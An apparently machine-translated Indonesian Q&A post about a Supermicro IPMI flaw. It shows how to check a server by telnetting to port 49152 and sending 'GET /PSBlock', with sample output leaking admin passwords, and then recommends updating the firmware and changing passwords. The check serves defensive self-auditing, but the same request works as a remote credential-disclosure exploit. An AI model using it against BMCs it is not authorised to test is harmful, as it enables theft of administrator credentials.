Saya sudah beberapa server Supermicro dengan IPMI berjalan, dan seperti yang dijelaskan dalam blog ini ( http://blog.cari.net/carisirt-yet-another-bmc-vulnerability-and-some-added-extras ) ada kerentanan penting untuk dapatkan kata sandi admin plaintext dari lokasi yang jauh.
Bagaimana cara memeriksa apakah motherboard server saya terganggu?
Jawaban:
Cukup telnet ke Alamat IP IPMI di port 49152 dan lakukan permintaan GET tertentu. Anda harus mendapatkan pengguna dan kata sandi jika Anda dikompromikan.
telnet server.example.com 49152
Setelah koneksi meminta GET /PSBlockdan menonton hasilnya, seharusnya menjadi seperti ini:
Trying 192.168.1.22...
Connected to server.example.com.
Escape character is '^]'.
GET /PSBlock
Menjawab:
=%}?
0adminADMIN**yourPlaintextPasswordHere**;TTroot**AnotherPassword**???%?v?i?o???DDD@??
Untuk mengatasi masalah ini perbarui firmware IPMI ke versi terbaru. Firmware khusus untuk pengontrol IPMI Anda, jadi Anda harus mendapatkan yang ditentukan di situs web Supermicro.
Kemudian setelah memperbarui firmware, ubah kata sandi Anda .